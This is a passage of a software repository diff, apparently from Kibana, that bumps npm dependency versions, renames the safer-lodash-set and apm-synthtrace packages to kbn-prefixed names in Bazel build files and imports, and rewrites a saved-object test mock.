"link:bazel-bin/packages/shared-ux/page/kibana_template/types", + "@kbn/shared-ux-page-no-data": "link:bazel-bin/packages/shared-ux/page/no_data/impl", + "@kbn/shared-ux-page-no-data-config": "link:bazel-bin/packages/shared-ux/page/no_data_config/impl", + "@kbn/shared-ux-page-no-data-config-mocks": "link:bazel-bin/packages/shared-ux/page/no_data_config/mocks", + "@kbn/shared-ux-page-no-data-config-types": "link:bazel-bin/packages/shared-ux/page/no_data_config/types", + "@kbn/shared-ux-page-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/no_data/mocks", + "@kbn/shared-ux-page-no-data-types": "link:bazel-bin/packages/shared-ux/page/no_data/types", "@kbn/shared-ux-page-solution-nav": "link:bazel-bin/packages/shared-ux/page/solution_nav", "@kbn/shared-ux-prompt-no-data-views": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/impl", "@kbn/shared-ux-prompt-no-data-views-mocks": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/mocks", "@kbn/shared-ux-prompt-no-data-views-types": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/types", - "@kbn/shared-ux-services": "link:bazel-bin/packages/kbn-shared-ux-services", - "@kbn/shared-ux-storybook": "link:bazel-bin/packages/kbn-shared-ux-storybook", + "@kbn/shared-ux-storybook-config": "link:bazel-bin/packages/shared-ux/storybook/config", "@kbn/shared-ux-storybook-mock": "link:bazel-bin/packages/shared-ux/storybook/mock", "@kbn/shared-ux-utility": "link:bazel-bin/packages/kbn-shared-ux-utility", "@kbn/std": "link:bazel-bin/packages/kbn-std", @@ -401,7 +409,7 @@ "deep-freeze-strict": "^1.1.1", "deepmerge": "^4.2.2", "del": "^5.1.0", - "elastic-apm-node": "^3.37.0", + "elastic-apm-node": "^3.38.0", "email-addresses": "^5.0.0", "execa": "^4.0.2", "expiry-js": "0.1.7", @@ -538,7 +546,6 @@ "redux-saga": "^1.1.3", "redux-thunk": "^2.3.0", "redux-thunks": "^1.0.0", - "regenerator-runtime": "^0.13.3", "remark-parse": "^8.0.3", "remark-stringify": "^8.0.3", "require-in-the-middle": "^5.1.0", @@ -579,30 +586,32 @@ "vinyl": "^2.2.0", "whatwg-fetch": "^3.0.0", "xml2js": "^0.4.22", + "xterm": "^4.18.0", + "xterm-addon-fit": "^0.5.0", "yauzl": "^2.10.0" }, "devDependencies": { "@apidevtools/swagger-parser": "^10.0.3", - "@babel/cli": "^7.18.9", - "@babel/core": "^7.18.9", + "@babel/cli": "^7.18.10", + "@babel/core": "^7.18.10", "@babel/eslint-parser": "^7.18.9", - "@babel/eslint-plugin": "^7.17.7", - "@babel/generator": "^7.18.9", + "@babel/eslint-plugin": "^7.18.10", + "@babel/generator": "^7.18.12", "@babel/helper-plugin-utils": "^7.18.9", - "@babel/parser": "^7.18.9", + "@babel/parser": "^7.18.11", "@babel/plugin-proposal-class-properties": "^7.18.6", "@babel/plugin-proposal-export-namespace-from": "^7.18.9", "@babel/plugin-proposal-nullish-coalescing-operator": "^7.18.6", "@babel/plugin-proposal-object-rest-spread": "^7.18.9", "@babel/plugin-proposal-optional-chaining": "^7.18.9", "@babel/plugin-proposal-private-methods": "^7.18.6", - "@babel/plugin-transform-runtime": "^7.18.9", - "@babel/preset-env": "^7.18.9", + "@babel/plugin-transform-runtime": "^7.18.10", + "@babel/preset-env": "^7.18.10", "@babel/preset-react": "^7.18.6", "@babel/preset-typescript": "^7.18.6", "@babel/register": "^7.18.9", - "@babel/traverse": "^7.18.9", - "@babel/types": "^7.18.9", + "@babel/traverse": "^7.18.11", + "@babel/types": "^7.18.10", "@bazel/ibazel": "^0.16.2", "@bazel/typescript": "4.6.2", "@cypress/code-coverage": "^3.9.12", @@ -723,7 +732,6 @@ "@types/deep-freeze-strict": "^1.1.0", "@types/delete-empty": "^2.0.0", "@types/ejs": "^3.0.6", - "@types/elastic__apm-synthtrace": "link:bazel-bin/packages/elastic-apm-synthtrace/npm_module_types", "@types/enzyme": "^3.10.8", "@types/eslint": "^7.28.0", "@types/express": "^4.17.13", @@ -773,10 +781,12 @@ "@types/kbn__analytics-shippers-elastic-v3-server": "link:bazel-bin/packages/analytics/shippers/elastic_v3/server/npm_module_types", "@types/kbn__analytics-shippers-fullstory": "link:bazel-bin/packages/analytics/shippers/fullstory/npm_module_types", "@types/kbn__apm-config-loader": "link:bazel-bin/packages/kbn-apm-config-loader/npm_module_types", + "@types/kbn__apm-synthtrace": "link:bazel-bin/packages/kbn-apm-synthtrace/npm_module_types", "@types/kbn__apm-utils": "link:bazel-bin/packages/kbn-apm-utils/npm_module_types", "@types/kbn__axe-config": "link:bazel-bin/packages/kbn-axe-config/npm_module_types", "@types/kbn__bazel-packages": "link:bazel-bin/packages/kbn-bazel-packages/npm_module_types", "@types/kbn__bazel-runner": "link:bazel-bin/packages/kbn-bazel-runner/npm_module_types", + "@types/kbn__chart-icons": "link:bazel-bin/packages/kbn-chart-icons/npm_module_types", "@types/kbn__ci-stats-core": "link:bazel-bin/packages/kbn-ci-stats-core/npm_module_types", "@types/kbn__ci-stats-performance-metrics": "link:bazel-bin/packages/kbn-ci-stats-performance-metrics/npm_module_types", "@types/kbn__ci-stats-reporter": "link:bazel-bin/packages/kbn-ci-stats-reporter/npm_module_types", @@ -972,7 +982,6 @@ "@types/kbn__shared-ux-card-no-data": "link:bazel-bin/packages/shared-ux/card/no_data/impl/npm_module_types", "@types/kbn__shared-ux-card-no-data-mocks": "link:bazel-bin/packages/shared-ux/card/no_data/mocks/npm_module_types", "@types/kbn__shared-ux-card-no-data-types": "link:bazel-bin/packages/shared-ux/card/no_data/types/npm_module_types", - "@types/kbn__shared-ux-components": "link:bazel-bin/packages/kbn-shared-ux-components/npm_module_types", "@types/kbn__shared-ux-link-redirect-app": "link:bazel-bin/packages/shared-ux/link/redirect_app/impl/npm_module_types", "@types/kbn__shared-ux-link-redirect-app-mocks": "link:bazel-bin/packages/shared-ux/link/redirect_app/mocks/npm_module_types", "@types/kbn__shared-ux-link-redirect-app-types": "link:bazel-bin/packages/shared-ux/link/redirect_app/types/npm_module_types", @@ -982,12 +991,20 @@ "@types/kbn__shared-ux-page-kibana-no-data": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/impl/npm_module_types", "@types/kbn__shared-ux-page-kibana-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/mocks/npm_module_types", "@types/kbn__shared-ux-page-kibana-no-data-types": "link:bazel-bin/packages/shared-ux/page/kibana_no_data/types/npm_module_types", + "@types/kbn__shared-ux-page-kibana-template": "link:bazel-bin/packages/shared-ux/page/kibana_template/impl/npm_module_types", + "@types/kbn__shared-ux-page-kibana-template-mocks": "link:bazel-bin/packages/shared-ux/page/kibana_template/mocks/npm_module_types", + "@types/kbn__shared-ux-page-kibana-template-types": "link:bazel-bin/packages/shared-ux/page/kibana_template/types/npm_module_types", + "@types/kbn__shared-ux-page-no-data": "link:bazel-bin/packages/shared-ux/page/no_data/impl/npm_module_types", + "@types/kbn__shared-ux-page-no-data-config": "link:bazel-bin/packages/shared-ux/page/no_data_config/impl/npm_module_types", + "@types/kbn__shared-ux-page-no-data-config-mocks": "link:bazel-bin/packages/shared-ux/page/no_data_config/mocks/npm_module_types", + "@types/kbn__shared-ux-page-no-data-config-types": "link:bazel-bin/packages/shared-ux/page/no_data_config/types/npm_module_types", + "@types/kbn__shared-ux-page-no-data-mocks": "link:bazel-bin/packages/shared-ux/page/no_data/mocks/npm_module_types", + "@types/kbn__shared-ux-page-no-data-types": "link:bazel-bin/packages/shared-ux/page/no_data/types/npm_module_types", "@types/kbn__shared-ux-page-solution-nav": "link:bazel-bin/packages/shared-ux/page/solution_nav/npm_module_types", "@types/kbn__shared-ux-prompt-no-data-views": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/impl/npm_module_types", "@types/kbn__shared-ux-prompt-no-data-views-mocks": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/mocks/npm_module_types", "@types/kbn__shared-ux-prompt-no-data-views-types": "link:bazel-bin/packages/shared-ux/prompt/no_data_views/types/npm_module_types", - "@types/kbn__shared-ux-services": "link:bazel-bin/packages/kbn-shared-ux-services/npm_module_types", - "@types/kbn__shared-ux-storybook": "link:bazel-bin/packages/kbn-shared-ux-storybook/npm_module_types", + "@types/kbn__shared-ux-storybook-config": "link:bazel-bin/packages/shared-ux/storybook/config/npm_module_types", "@types/kbn__shared-ux-storybook-mock": "link:bazel-bin/packages/shared-ux/storybook/mock/npm_module_types", "@types/kbn__shared-ux-utility": "link:bazel-bin/packages/kbn-shared-ux-utility/npm_module_types", "@types/kbn__some-dev-log": "link:bazel-bin/packages/kbn-some-dev-log/npm_module_types", @@ -1176,9 +1193,7 @@ "file-loader": "^4.2.0", "form-data": "^4.0.0", "geckodriver": "^3.0.2", - "gulp-babel": "^8.0.0", "gulp-brotli": "^3.0.0", - "gulp-gzip": "^1.4.2", "gulp-postcss": "^9.0.1", "gulp-sourcemaps": "2.6.5", "gulp-terser": "^2.1.0", @@ -1199,6 +1214,7 @@ "jest-diff": "^26.6.2", "jest-environment-jsdom": "^26.6.2", "jest-environment-jsdom-thirteen": "^1.0.1", + "jest-mock": "^26.6.2", "jest-raw-loader": "^1.0.1", "jest-runtime": "^26", "jest-silent-reporter": "^0.5.0", @@ -1234,6 +1250,7 @@ "pbf": "3.2.1", "peggy": "^1.2.0", "pirates": "^4.0.1", + "piscina": "^3.2.0", "playwright": "^1.17.1", "pngjs": "^3.4.0", "postcss": "^8.4.14", @@ -1242,6 +1259,7 @@ "postcss-scss": "^4.0.4", "prettier": "^2.7.1", "pretty-format": "^27.5.1", + "proxy": "^1.0.2", "q": "^1.5.1", "raw-loader": "^3.1.0", "react-test-renderer": "^16.14.0", @@ -1261,6 +1279,7 @@ "superagent": "^3.8.2", "supertest": "^3.1.0", "supports-color": "^7.0.0", + "svgo": "^2.8.0", "tape": "^5.0.1", "tempy": "^0.3.0", "terser": "^5.14.1", diff --git a/packages/BUILD.bazel b/packages/BUILD.bazel index c0957f7ee2bb8..a9a0377b679dd 100644 --- a/packages/BUILD.bazel +++ b/packages/BUILD.bazel @@ -116,8 +116,6 @@ filegroup( "//packages/core/ui-settings/core-ui-settings-browser-mocks:build", "//packages/core/ui-settings/core-ui-settings-browser:build", "//packages/core/ui-settings/core-ui-settings-common:build", - "//packages/elastic-apm-synthtrace:build", - "//packages/elastic-safer-lodash-set:build", "//packages/home/sample_data_card:build", "//packages/home/sample_data_tab:build", "//packages/home/sample_data_types:build", @@ -127,12 +125,14 @@ filegroup( "//packages/kbn-ambient-ui-types:build", "//packages/kbn-analytics:build", "//packages/kbn-apm-config-loader:build", + "//packages/kbn-apm-synthtrace:build", "//packages/kbn-apm-utils:build", "//packages/kbn-axe-config:build", "//packages/kbn-babel-plugin-synthetic-packages:build", "//packages/kbn-babel-preset:build", "//packages/kbn-bazel-packages:build", "//packages/kbn-bazel-runner:build", + "//packages/kbn-chart-icons:build", "//packages/kbn-ci-stats-core:build", "//packages/kbn-ci-stats-performance-metrics:build", "//packages/kbn-ci-stats-reporter:build", @@ -192,6 +192,7 @@ filegroup( "//packages/kbn-repo-source-classifier-cli:build", "//packages/kbn-repo-source-classifier:build", "//packages/kbn-rule-data-utils:build", + "//packages/kbn-safer-lodash-set:build", "//packages/kbn-securitysolution-autocomplete:build", "//packages/kbn-securitysolution-es-utils:build", "//packages/kbn-securitysolution-hook-utils:build", @@ -209,9 +210,6 @@ filegroup( "//packages/kbn-server-http-tools:build", "//packages/kbn-server-route-repository:build", "//packages/kbn-shared-svg:build", - "//packages/kbn-shared-ux-components:build", - "//packages/kbn-shared-ux-services:build", - "//packages/kbn-shared-ux-storybook:build", "//packages/kbn-shared-ux-utility:build", "//packages/kbn-some-dev-log:build", "//packages/kbn-sort-package-json:build", @@ -257,10 +255,20 @@ filegroup( "//packages/shared-ux/page/kibana_no_data/impl:build", "//packages/shared-ux/page/kibana_no_data/mocks:build", "//packages/shared-ux/page/kibana_no_data/types:build", + "//packages/shared-ux/page/kibana_template/impl:build", + "//packages/shared-ux/page/kibana_template/mocks:build", + "//packages/shared-ux/page/kibana_template/types:build", + "//packages/shared-ux/page/no_data_config/impl:build", + "//packages/shared-ux/page/no_data_config/mocks:build", + "//packages/shared-ux/page/no_data_config/types:build", + "//packages/shared-ux/page/no_data/impl:build", + "//packages/shared-ux/page/no_data/mocks:build", + "//packages/shared-ux/page/no_data/types:build", "//packages/shared-ux/page/solution_nav:build", "//packages/shared-ux/prompt/no_data_views/impl:build", "//packages/shared-ux/prompt/no_data_views/mocks:build", "//packages/shared-ux/prompt/no_data_views/types:build", + "//packages/shared-ux/storybook/config:build", "//packages/shared-ux/storybook/mock:build", "//x-pack/packages/ml/agg_utils:build", "//x-pack/packages/ml/aiops_components:build", @@ -381,18 +389,18 @@ filegroup( "//packages/core/ui-settings/core-ui-settings-browser-mocks:build_types", "//packages/core/ui-settings/core-ui-settings-browser:build_types", "//packages/core/ui-settings/core-ui-settings-common:build_types", - "//packages/elastic-apm-synthtrace:build_types", - "//packages/elastic-safer-lodash-set:build_types", "//packages/home/sample_data_card:build_types", "//packages/home/sample_data_tab:build_types", "//packages/kbn-ace:build_types", "//packages/kbn-alerts:build_types", "//packages/kbn-analytics:build_types", "//packages/kbn-apm-config-loader:build_types", + "//packages/kbn-apm-synthtrace:build_types", "//packages/kbn-apm-utils:build_types", "//packages/kbn-axe-config:build_types", "//packages/kbn-bazel-packages:build_types", "//packages/kbn-bazel-runner:build_types", + "//packages/kbn-chart-icons:build_types", "//packages/kbn-ci-stats-core:build_types", "//packages/kbn-ci-stats-performance-metrics:build_types", "//packages/kbn-ci-stats-reporter:build_types", @@ -447,6 +455,7 @@ filegroup( "//packages/kbn-repo-source-classifier-cli:build_types", "//packages/kbn-repo-source-classifier:build_types", "//packages/kbn-rule-data-utils:build_types", + "//packages/kbn-safer-lodash-set:build_types", "//packages/kbn-securitysolution-autocomplete:build_types", "//packages/kbn-securitysolution-es-utils:build_types", "//packages/kbn-securitysolution-hook-utils:build_types", @@ -464,9 +473,6 @@ filegroup( "//packages/kbn-server-http-tools:build_types", "//packages/kbn-server-route-repository:build_types", "//packages/kbn-shared-svg:build_types", - "//packages/kbn-shared-ux-components:build_types", - "//packages/kbn-shared-ux-services:build_types", - "//packages/kbn-shared-ux-storybook:build_types", "//packages/kbn-shared-ux-utility:build_types", "//packages/kbn-some-dev-log:build_types", "//packages/kbn-sort-package-json:build_types", @@ -501,9 +507,16 @@ filegroup( "//packages/shared-ux/page/analytics_no_data/mocks:build_types", "//packages/shared-ux/page/kibana_no_data/impl:build_types", "//packages/shared-ux/page/kibana_no_data/mocks:build_types", + "//packages/shared-ux/page/kibana_template/impl:build_types", + "//packages/shared-ux/page/kibana_template/mocks:build_types", + "//packages/shared-ux/page/no_data_config/impl:build_types", + "//packages/shared-ux/page/no_data_config/mocks:build_types", + "//packages/shared-ux/page/no_data/impl:build_types", + "//packages/shared-ux/page/no_data/mocks:build_types", "//packages/shared-ux/page/solution_nav:build_types", "//packages/shared-ux/prompt/no_data_views/impl:build_types", "//packages/shared-ux/prompt/no_data_views/mocks:build_types", + "//packages/shared-ux/storybook/config:build_types", "//packages/shared-ux/storybook/mock:build_types", "//x-pack/packages/ml/agg_utils:build_types", "//x-pack/packages/ml/aiops_components:build_types", diff --git a/packages/core/config/core-config-server-internal/BUILD.bazel b/packages/core/config/core-config-server-internal/BUILD.bazel index d2580d6736a76..7bc32e4198ab1 100644 --- a/packages/core/config/core-config-server-internal/BUILD.bazel +++ b/packages/core/config/core-config-server-internal/BUILD.bazel @@ -26,7 +26,7 @@ NPM_MODULE_EXTRA_FILES = [ ] RUNTIME_DEPS = [ - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-config", "//packages/core/base/core-base-server-internal", "//packages/kbn-config-mocks", @@ -36,7 +36,7 @@ RUNTIME_DEPS = [ TYPES_DEPS = [ "@npm//@types/node", "@npm//@types/jest", - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-config:npm_module_types", "//packages/kbn-config-mocks:npm_module_types", "//packages/core/base/core-base-server-internal:npm_module_types", diff --git a/packages/core/logging/core-logging-server-internal/BUILD.bazel b/packages/core/logging/core-logging-server-internal/BUILD.bazel index 199e47161d6a0..abed6f741fc39 100644 --- a/packages/core/logging/core-logging-server-internal/BUILD.bazel +++ b/packages/core/logging/core-logging-server-internal/BUILD.bazel @@ -29,7 +29,7 @@ RUNTIME_DEPS = [ "@npm//lodash", "@npm//moment-timezone", "@npm//elastic-apm-node", - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-config-schema", "//packages/kbn-std", ] @@ -41,7 +41,7 @@ TYPES_DEPS = [ "@npm//rxjs", "@npm//@types/moment-timezone", "@npm//elastic-apm-node", - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-logging:npm_module_types", "//packages/kbn-config-schema:npm_module_types", "//packages/core/base/core-base-server-internal:npm_module_types", diff --git a/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts b/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts index 2618f0ed50587..45e62713980c0 100644 --- a/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts +++ b/packages/core/logging/core-logging-server-internal/src/appenders/rewrite/policies/meta/meta_policy.ts @@ -8,7 +8,7 @@ import { schema } from '@kbn/config-schema'; import { LogRecord } from '@kbn/logging'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { has, unset } from 'lodash'; import { assertNever } from '@kbn/std'; import type { MetaRewritePolicyConfig } from '@kbn/core-logging-server'; diff --git a/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts b/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts index 64186392caa56..7e794f0731cf5 100644 --- a/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts +++ b/packages/core/logging/core-logging-server-internal/src/global_context/merge_global_context.ts @@ -7,7 +7,7 @@ */ import { has } from 'lodash'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { LogMeta } from '@kbn/logging'; import { GlobalContext } from './types'; diff --git a/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel b/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel index b0d0964c54a96..40aa528d50a98 100644 --- a/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel +++ b/packages/core/saved-objects/core-saved-objects-browser-internal/BUILD.bazel @@ -29,7 +29,7 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "@npm//lodash", - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", ### test dependencies "//packages/core/http/core-http-browser-mocks", ] @@ -38,7 +38,7 @@ TYPES_DEPS = [ "@npm//@types/node", "@npm//@types/jest", "@npm//lodash", - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/core/base/core-base-browser-internal:npm_module_types", "//packages/core/http/core-http-browser:npm_module_types", "//packages/core/saved-objects/core-saved-objects-common:npm_module_types", diff --git a/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts b/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts index 89501c69dcfb5..adda64d8b4ff3 100644 --- a/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts +++ b/packages/core/saved-objects/core-saved-objects-browser-internal/src/simple_saved_object.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, has } from 'lodash'; import type { SavedObject as SavedObjectType } from '@kbn/core-saved-objects-common'; import type { diff --git a/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts b/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts index 6ed402ccc30c5..b65c476c54ee0 100644 --- a/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts +++ b/packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts @@ -6,15 +6,62 @@ * Side Public License, v 1. */ -import type { SavedObjectsClientContract } from '@kbn/core-saved-objects-api-browser'; -import { SimpleSavedObjectImpl } from '@kbn/core-saved-objects-browser-internal'; +import type { + SavedObjectsClientContract, + SimpleSavedObject, +} from '@kbn/core-saved-objects-api-browser'; import type { SavedObject } from '@kbn/core-saved-objects-common'; +type T = unknown; + +const simpleSavedObjectMockDefaults: Partial> = { + attributes: {}, + _version: '', + id: 'id', + type: 'type', + migrationVersion: {}, + coreMigrationVersion: '8.0.0', + error: undefined, + references: [], + updatedAt: '', + namespaces: undefined, +}; + const createSimpleSavedObjectMock = ( - client: SavedObjectsClientContract, - savedObject: SavedObject -) => new SimpleSavedObjectImpl(client, savedObject); + savedObject: SavedObject +): jest.Mocked> => { + const mock = { + ...simpleSavedObjectMockDefaults, + attributes: savedObject.attributes, + _version: savedObject.version, + id: savedObject.id, + type: savedObject.type, + migrationVersion: savedObject.migrationVersion, + coreMigrationVersion: savedObject.coreMigrationVersion, + error: savedObject.error, + references: savedObject.references, + updatedAt: savedObject.updated_at, + namespaces: savedObject.namespaces, + get: jest.fn(), + set: jest.fn(), + has: jest.fn(), + save: jest.fn(), + delete: jest.fn(), + }; + mock.get.mockImplementation( + (key: string): any => (savedObject.attributes as any)[key] || undefined + ); + mock.set.mockReturnValue((key: string, value: any) => { + (savedObject as any)[key] = value; + return savedObject; + }); + mock.has.mockReturnValue(true); + mock.save.mockImplementation(() => Promise.resolve(mock)); + mock.delete.mockImplementation(() => Promise.resolve({})); + return mock; +}; export const simpleSavedObjectMock = { - create: createSimpleSavedObjectMock, + create: (client: SavedObjectsClientContract, savedObject: SavedObject) => + createSimpleSavedObjectMock(savedObject), }; diff --git a/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel b/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel index 19d2290d18f84..3eb0b8d9184fa 100644 --- a/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel +++ b/packages/core/test-helpers/core-test-helpers-deprecations-getters/BUILD.bazel @@ -27,7 +27,7 @@ NPM_MODULE_EXTRA_FILES = [ ] RUNTIME_DEPS = [ - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-config", "//packages/kbn-config-mocks", ] @@ -35,7 +35,7 @@ RUNTIME_DEPS = [ TYPES_DEPS = [ "@npm//@types/node", "@npm//@types/jest", - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-config:npm_module_types", "//packages/kbn-config-mocks:npm_module_types", ] diff --git a/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts b/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts index 825649a77ac51..9bdbd9c9b3efa 100644 --- a/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts +++ b/packages/core/test-helpers/core-test-helpers-deprecations-getters/src/deprecations_getters.ts @@ -5,7 +5,7 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import type { ConfigDeprecationProvider, ConfigDeprecationContext } from '@kbn/config'; import { configDeprecationFactory, applyDeprecations } from '@kbn/config'; import { configDeprecationsMock } from '@kbn/config-mocks'; diff --git a/packages/kbn-apm-config-loader/BUILD.bazel b/packages/kbn-apm-config-loader/BUILD.bazel index 74b7fdfe52a1a..b7d9249c9f587 100644 --- a/packages/kbn-apm-config-loader/BUILD.bazel +++ b/packages/kbn-apm-config-loader/BUILD.bazel @@ -27,14 +27,14 @@ NPM_MODULE_EXTRA_FILES = [ ] RUNTIME_DEPS = [ - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-utils", "@npm//js-yaml", "@npm//lodash", ] TYPES_DEPS = [ - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-utils:npm_module_types", "@npm//@elastic/apm-rum", "@npm//@types/jest", diff --git a/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts b/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts index e2ae5a2dce3ba..54993ce0843f9 100644 --- a/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts +++ b/packages/kbn-apm-config-loader/src/utils/apply_config_overrides.ts @@ -6,7 +6,7 @@ * Side Public License, v 1. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { getArgValue } from './read_argv'; /** diff --git a/packages/kbn-apm-config-loader/src/utils/read_config.ts b/packages/kbn-apm-config-loader/src/utils/read_config.ts index 0d6fce88b0532..f41f8e66c7d5b 100644 --- a/packages/kbn-apm-config-loader/src/utils/read_config.ts +++ b/packages/kbn-apm-config-loader/src/utils/read_config.ts @@ -9,7 +9,7 @@ import { readFileSync } from 'fs'; import { safeLoad } from 'js-yaml'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { isPlainObject } from 'lodash'; import { ensureDeepObject } from './ensure_deep_object'; diff --git a/packages/elastic-apm-synthtrace/BUILD.bazel b/packages/kbn-apm-synthtrace/BUILD.bazel similarity index 96% rename from packages/elastic-apm-synthtrace/BUILD.bazel rename to packages/kbn-apm-synthtrace/BUILD.bazel index d0963f43e171b..0e759e33c0ab5 100644 --- a/packages/elastic-apm-synthtrace/BUILD.bazel +++ b/packages/kbn-apm-synthtrace/BUILD.bazel @@ -2,8 +2,8 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_BASE_NAME = "elastic-apm-synthtrace" -PKG_REQUIRE_NAME = "@elastic/apm-synthtrace" +PKG_BASE_NAME = "kbn-apm-synthtrace" +PKG_REQUIRE_NAME = "@kbn/apm-synthtrace" SOURCE_FILES = glob( [ diff --git a/packages/elastic-apm-synthtrace/README.md b/packages/kbn-apm-synthtrace/README.md similarity index 92% rename from packages/elastic-apm-synthtrace/README.md rename to packages/kbn-apm-synthtrace/README.md index 24ce3b055abd0..3afc25fb7e9a8 100644 --- a/packages/elastic-apm-synthtrace/README.md +++ b/packages/kbn-apm-synthtrace/README.md @@ -1,6 +1,6 @@ -# @elastic/apm-synthtrace +# @kbn/apm-synthtrace -`@elastic/apm-synthtrace` is a tool in technical preview to generate synthetic APM data. It is intended to be used for development and testing of the Elastic APM app in Kibana. +`@kbn/apm-synthtrace` is a tool in technical preview to generate synthetic APM data. It is intended to be used for development and testing of the Elastic APM app in Kibana. At a high-level, the module works by modeling APM events/metricsets with [a fluent API](https://en.wikipedia.org/wiki/Fluent_interface). The models can then be serialized and converted to Elasticsearch documents. In the future we might support APM Server as an output as well. @@ -25,7 +25,7 @@ This library can currently be used in two ways: #### Example ```ts -import { service, timerange, toElasticsearchOutput } from '@elastic/apm-synthtrace'; +import { service, timerange, toElasticsearchOutput } from '@kbn/apm-synthtrace'; const instance = service('synth-go', 'production', 'go').instance('instance-a'); @@ -72,14 +72,14 @@ const esEvents = toElasticsearchOutput(traceEvents.concat(metricsets)); #### Generating metricsets -`@elastic/apm-synthtrace` can also automatically generate transaction metrics, span destination metrics and transaction breakdown metrics based on the generated trace events. If we expand on the previous example: +`@kbn/apm-synthtrace` can also automatically generate transaction metrics, span destination metrics and transaction breakdown metrics based on the generated trace events. If we expand on the previous example: ```ts import { getTransactionMetrics, getSpanDestinationMetrics, getBreakdownMetrics, -} from '@elastic/apm-synthtrace'; +} from '@kbn/apm-synthtrace'; const esEvents = toElasticsearchOutput([ ...traceEvents, @@ -91,7 +91,7 @@ const esEvents = toElasticsearchOutput([ ### CLI -Via the CLI, you can run scenarios, either using a fixed time range or continuously generating data. Scenarios are available in [`packages/elastic-apm-synthtrace/src/scenarios/`](https://github.com/elastic/kibana/blob/main/packages/elastic-apm-synthtrace/src/scenarios/). +Via the CLI, you can run scenarios, either using a fixed time range or continuously generating data. Scenarios are available in [`packages/kbn-apm-synthtrace/src/scenarios/`](https://github.com/elastic/kibana/blob/main/packages/kbn-apm-synthtrace/src/scenarios/). For live data ingestion: diff --git a/packages/elastic-apm-synthtrace/bin/synthtrace b/packages/kbn-apm-synthtrace/bin/synthtrace similarity index 100% rename from packages/elastic-apm-synthtrace/bin/synthtrace rename to packages/kbn-apm-synthtrace/bin/synthtrace diff --git a/packages/elastic-apm-synthtrace/jest.config.js b/packages/kbn-apm-synthtrace/jest.config.js similarity index 89% rename from packages/elastic-apm-synthtrace/jest.config.js rename to packages/kbn-apm-synthtrace/jest.config.js index 13d8643c5213c..e89880dc7e8df 100644 --- a/packages/elastic-apm-synthtrace/jest.config.js +++ b/packages/kbn-apm-synthtrace/jest.config.js @@ -9,7 +9,7 @@ module.exports = { preset: '@kbn/test', rootDir: '../..', - roots: ['/packages/elastic-apm-synthtrace'], + roots: ['/packages/kbn-apm-synthtrace'], setupFiles: [], setupFilesAfterEnv: [], }; diff --git a/packages/elastic-apm-synthtrace/package.json 